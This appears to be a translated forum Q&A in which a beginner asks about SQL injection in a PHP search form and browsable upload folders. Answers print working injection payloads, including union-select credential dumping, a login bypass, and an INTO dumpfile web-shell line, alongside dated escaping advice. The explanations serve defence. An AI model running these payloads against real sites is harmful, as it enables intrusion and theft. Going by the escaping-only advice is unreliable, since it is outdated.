网站安全、sql注入和文件权限

发布于 2024-12-09 08:30:52 字数 336 浏览 1 评论 0原文

我正在构建一个非常小的网站(使用 PHP),但有 2 个大问题 第一个是关于我的搜索表单 我构建了一个非常简单的搜索表单来检索我的内容,然后我使用了一个在线安全工具并显示我的搜索表单容易受到 SQLi 的攻击 我对此一无所知,所以我开始测试在某些网站上发现的一些攻击 到目前为止,只有 'OR 'x'='x 有效(它返回我网站的全部内容,这很糟糕吗?攻击者怎么能伤害我? 第二个问题是关于我的照片,我使用名为 mywebsite.com/uploads/ 的文件夹来访问我的照片 尽管 /upload 受到保护,但子文件夹 uploads/temp 和 uploads/thumbs 通过浏览器可见 这也能伤人吗? 有什么建议吗?

I am building a very small website (with PHP) and I have 2 big issues
The first one is about my search form
I have build a really simple search form in order to retrieve my content, then I used an online security tool and show me that my search form was vulnerable to SQLi
I had no idea abut that so I started testing some attacks I found on some sites
As far as now only 'OR 'x'='x worked (it returns the entire content of my website, is this bad? How can an attacker hurt me?
The second issue is about my photos, I am using a folder called mywebsite.com/uploads/ to access my photos
Although /upload is protected the subfolders uploads/temp and uploads/thumbs are visible through the browser
May this be hurtful too?
Any advice?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(4

尛丟丟 2024-12-16 08:30:52

SQL 注入确实很糟糕,但我喜欢它:)

SQL 注入有很多种类型,例如

远程 sql 注入
sql盲注
自动绕过sql注入

 **Remote sql injection**

这是从网站黑客获取数据的简单方法,像程序员一样使用它
看这个例子

mysql_query("SELECT * FROM `table_name` WHERE id=".$_GET['id']." ) ;

我的代码中没有安全性

site.php?id=1

我的查询将像

mysql_query("SELECT * FROM `table_name` WHERE id=1 ) ;

黑客一样执行,他会杀死你的代码

site.php?id=1(这里的任何东西都可能会产生问题,例如:` ' az AZ / * / " )

因为查询会像这样

mysql_query("SELECT * FROM `table_name` WHERE id=1' ) ;

,所以单引号会在你的查询中出错

,黑客可以像这样攻击,

site.php?id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users

你的查询将像这样执行

mysql_query("SELECT * FROM `table_name` WHERE id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users) ");

,这将起作用:)

盲sql注入

黑客无法工作用简单的方法远程sql注入,

因为它在这里取决于正确和错误

,所以他将使用 and or

这样

 and (select user_name from users) ;

如果工作正常,脚本将工作良好,否则会发生错误

他可以像这样知道数据库信息

示例管理表是 admin

 and (select user_name from users) ;      x error

 and (select user_name from admin) ;      fine

自动绕过

它的 blicd sql 注入,但只有真实条件才能访问管理

mysql_query("SELECT * FROM `users` WHERE `user_name`= ".$_POST['user']." AND `password` ='".md5($_POST['pass'])."' ");

黑客可以像这个

user = everything' 或 1=1 一样登录 -

所以你的查询将类似于

mysql_query("SELECT * FROM `users` WHERE `user_name`= anything or 1=1 --");

数据库中的任何错误用户

,但条件或1=1 为 true

-- 将忽略您的密码检查

他可以轻松访问

保护

addslashes _ mysql_real_escape_string _ intval ( with number only )

文件夹权限您可以使用

空的 index.html , index.php ,

SQL injection is really bad but i like it :)

there is many types of sql injection like

remote sql injecton
blind sql injection
auto bypass sql injection

 **Remote sql injection**

its the easy way to get data from site hacker use it like coders
see this example

mysql_query("SELECT * FROM `table_name` WHERE id=".$_GET['id']." ) ;

There is no security in my code

site.php?id=1

my query will execute like

mysql_query("SELECT * FROM `table_name` WHERE id=1 ) ;

if hacker he will kill your code

site.php?id=1(any thing here can make problem ex: ` ' a-z A-Z / * / " )

Because query will be like this

mysql_query("SELECT * FROM `table_name` WHERE id=1' ) ;

so single quotaion will make error in your query

and hacker can attack like this

site.php?id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users

here your query will execute like

mysql_query("SELECT * FROM `table_name` WHERE id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users) ");

and this will work :)

blind sql injection

hacker cannot work with easy way remote sql injection

because it here depend on right and false

so he will use and or

like this

 and (select user_name from users) ;

if work fine the script will work good else error will happen

he can know database info like this

example admin table is admin

 and (select user_name from users) ;      x error

 and (select user_name from admin) ;      fine

auto bypass

its blicd sql injection but only true condition can access to admin

mysql_query("SELECT * FROM `users` WHERE `user_name`= ".$_POST['user']." AND `password` ='".md5($_POST['pass'])."' ");

hacker can login like this

user = anything' or 1=1 --

so your query will be like

mysql_query("SELECT * FROM `users` WHERE `user_name`= anything or 1=1 --");

anything is error user in databse

but condition or 1=1 is true

-- will ignore your password check

he can access easily

protect

addslashes _ mysql_real_escape_string _ intval ( with number only )

folder premission you can use

empty index.html , index.php ,

清风不识月 2024-12-16 08:30:52

如果您允许 SQL 注入,攻击者就可以对您的网站做各种坏事。他们可以将代码注入 DROP DATABASE,从而删除整个数据库!

如果您以 root 用户身份登录 mysql,他们可能会在您的服务器上写入(并创建)文件。

注射;

SELECT '<?php system($_GET[''cmd'']); ?>' INTO dumpfile('./command.php');

这是闯入服务器的常见第一步,允许攻击者在 www-data 用户下执行任意命令。从这里开始,将您的服务器引入僵尸网络,使用它发送垃圾邮件(将您列入发送电子邮件的黑名单),或者干脆删除所有文件来毁掉您的一天,都是微不足道的。

必须做的是清理所有用户输入。因此,在您的搜索处理器中,您必须在将搜索查询传递到数据库之前对搜索查询中的所有特殊字符进行转义,您可以使用 mysql_real_escape_string(); 来执行此操作;

所以;

$search_query = mysql_real_escape_string($_POST['search']);

然后在 mysql 查询中使用 $search_query 是安全的。

If you allow SQL injection, an attacker can do all sorts of bad things to your website. They can inject code to DROP DATABASE, deleting your entire database!

If you are logging into your mysql as the root user, they can potentially write to files (and create) files on your server.

The injection;

SELECT '<?php system($_GET[''cmd'']); ?>' INTO dumpfile('./command.php');

Would be a common first step to breaking into your server, allowing the attacker to execute arbitrary commands under the www-data user. From here it is trivial to recruit your server into a botnet, use it to send spam (getting you blacklisted from sending emails), or simply delete all your files just to ruin your day.

What you must do, is to sanitise all user input. So, in your search processor, you must escape any special characters from the search query before passing it onto the database, you can do this using mysql_real_escape_string();

so;

$search_query = mysql_real_escape_string($_POST['search']);

It is then safe to use $search_query in your mysql query.

万水千山粽是情ミ 2024-12-16 08:30:52

SQL 注入——这很糟糕。
有人可以在您的数据库中运行他想要的任何查询、查找密码、删除您的整个数据等。
您可以通过使用有关目录的 mysql_real_escape_string 包装查询中的所有用户输入来避免这种情况

- 这实际上取决于您提供的访问权限。如果文件列表可用,并不意味着有人可以更改/执行它们

SQL injections - it's bad.
someone can run any query he wants in your database, find passwords, delete your entire data etc.
you can avoid it by wrapping all user input in your queries with mysql_real_escape_string

about the directories - it really depends on the accesses you provide. if file listing is available, it doesn't really mean that someone can make changes/execute them

谁人与我共长歌 2024-12-16 08:30:52

广告 SQL 注入:

  • 如果您有未发布的文章或仅对注册用户可用的文章等,显示整个内容可能会出现问题。
  • 尝试阅读有关 SQL 注入的更多信息。可能会执行第二个查询,在数据库中插入新数据 - 或者更糟糕的更改数据(例如密码)。有很多阅读材料,可以从以下开始: http:// /php.net/manual/en/security.database.sql-injection.php 清理所有输入并记住:即使您可能找不到通过安全漏洞造成伤害的方法,但这并不意味着不行人们会找到办法;

)文件夹:您的意思是任何用户都可以看到文件夹的内容?如果是这样,用户可能会看到他们不应该看到的图片。如果您有充分的理由保护(没有文件列表?)主目录,为什么不将其应用于 temps/ 和thumbs/ 子目录?

Ad SQL Injection:

  • Displaying the entire content can be a problem if you have unpublished articles or articles only available for registered users etc.
  • Try reading more on SQL Injections. It may be possible to execute a second query that inserts new data in your database - or worse changes data (for example passwords). There's a lot of reading material out there, a start could be: http://php.net/manual/en/security.database.sql-injection.php Sanitise all your input and remember: even if you may not find a way to do harm via a security hole it doesn't mean no one will find a way ;)

Ad the folders: you mean that any user can see the content of the folders? If so, users may see pictures they shouldn't see. If you had a good reason for protecting (no file listing?) the main directory, why not apply it to the temps/ and thumbs/ subdirectories?

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文